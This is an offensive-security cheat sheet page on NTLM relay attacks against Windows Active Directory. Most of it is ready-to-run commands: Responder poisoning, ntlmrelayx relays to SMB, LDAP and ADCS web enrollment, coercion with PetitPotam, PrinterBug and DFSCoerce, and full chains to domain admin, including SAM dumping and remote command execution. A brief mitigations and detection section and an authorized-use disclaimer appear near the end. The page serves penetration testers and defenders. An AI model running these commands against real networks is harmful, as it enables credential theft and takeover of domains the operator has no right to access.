← All cheat sheets

NTLM-RELAY

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

OVERVIEW#

NTLM relay forwards a victim's NTLM authentication to a third target
instead of cracking it. Combined with coercion (PetitPotam, PrinterBug)
it enables AD takeover paths (e.g. relay to ADCS/LDAP). This sheet
covers ntlmrelayx, coercion tools, and mitigations. Authorized
engagements only.

CORE CONCEPT#

# Victim authenticates to attacker -> attacker relays to Target
# Requires: SMB signing OFF (SMB relay) or LDAP signing/channel
# binding not enforced (LDAP relay). Self-relay is patched (CVE-2019-1384).

FIND RELAY TARGETS#

nxc smb <subnet> --gen-relay-list relaytargets.txt
                                     # Hosts with SMB signing disabled
nxc ldap <dc> -u u -p p -M ldap-checker
                                     # LDAP signing / channel binding state

RESPONDER (POISON + CAPTURE)#

responder -I eth0                    # Poison LLMNR/NBT-NS/mDNS
responder -I eth0 -w                 # With WPAD rogue proxy
# IMPORTANT: disable Responder's SMB/HTTP servers when relaying,
# so ntlmrelayx receives the auth instead:
#   edit /etc/responder/Responder.conf -> SMB = Off, HTTP = Off
responder -I eth0 -rdw               # Common combo w/ servers off

NTLMRELAYX - SMB RELAY#

impacket-ntlmrelayx -tf relaytargets.txt -smb2support
impacket-ntlmrelayx -t smb://<host> -smb2support -i
                                     # -i = interactive SMB client shell
impacket-ntlmrelayx -t smb://<host> -c "whoami"    # Exec command
impacket-ntlmrelayx -tf targets.txt --dump-sam     # Dump SAM if admin

NTLMRELAYX - LDAP / LDAPS RELAY#

impacket-ntlmrelayx -t ldap://<dc> --escalate-user <lowpriv>
                                     # Grant DCSync-like rights
impacket-ntlmrelayx -t ldaps://<dc> --delegate-access
                                     # RBCD - resource-based delegation
impacket-ntlmrelayx -t ldap://<dc> --add-computer ATTACKER$
                                     # Add a computer account

NTLMRELAYX - ADCS (ESC8)#

impacket-ntlmrelayx -t http://<ca>/certsrv/certfnsh.asp \
  -smb2support --adcs --template DomainController
# Relays machine/user auth to the CA web enrollment endpoint and
# obtains a certificate -> then PKINIT to get a TGT for that identity

COERCION (FORCE AUTH)#

# PetitPotam (MS-EFSRPC), often unauthenticated pre-patch:
impacket-petitpotam <attacker-ip> <dc>
# PrinterBug (MS-RPRN):
python3 printerbug.py corp.lu/u:p@<target> <attacker-ip>
# DFSCoerce (MS-DFSNM):
python3 dfscoerce.py -u u -p p <attacker-ip> <dc>
# Coercer (multi-method):
coercer coerce -u u -p p -l <attacker-ip> -t <target>

FULL CHAINS#

# ESC8: coerce DC auth -> relay to CA -> cert -> DA
#   term1: ntlmrelayx -t http://ca/certsrv/certfnsh.asp --adcs \
#          --template DomainController -smb2support
#   term2: petitpotam <attacker-ip> <dc-fqdn>
# RBCD: relay machine auth to LDAP -> --delegate-access ->
#   configure RBCD -> S4U -> impersonate admin on victim

MITIGATIONS (DEFENSIVE)#

# - Enforce SMB signing (required) on all hosts
# - Enforce LDAP signing + LDAP channel binding on DCs
# - Enable EPA on ADCS web enrollment; disable HTTP enrollment
# - Disable LLMNR, NBT-NS, mDNS via GPO
# - Patch PetitPotam/PrinterBug; restrict RPC coercion surfaces
# - Deploy WPAD via DNS to a valid host (block rogue WPAD)

EXAMPLES#

# Generate targets, then relay coerced DC auth to LDAP for RBCD
nxc smb 10.0.0.0/24 --gen-relay-list t.txt
impacket-ntlmrelayx -t ldap://dc --delegate-access -smb2support
python3 printerbug.py corp.lu/u:p@dc 10.10.10.5

# ESC8 certificate theft from a coerced domain controller
impacket-ntlmrelayx -t http://ca/certsrv/certfnsh.asp --adcs \
  --template DomainController -smb2support
impacket-petitpotam 10.10.10.5 dc.corp.lu

NOTES#

- SMB relay needs signing OFF on the *target*; LDAP relay needs
  signing/channel-binding NOT enforced on the DC
- You cannot relay SMB->SMB back to the originating host (patched)
- ESC8 is the highest-impact common chain: coercion + ADCS web enroll
- Pair with ADCS-ATTACKS.txt (ESC1-ESC16) and LDAP-ENUM.txt
- Detection: watch for anomalous machine auth to CA/LDAP, EFSRPC/RPRN
  calls, and NTLM from unexpected sources (see DEFENDER-KQL.txt)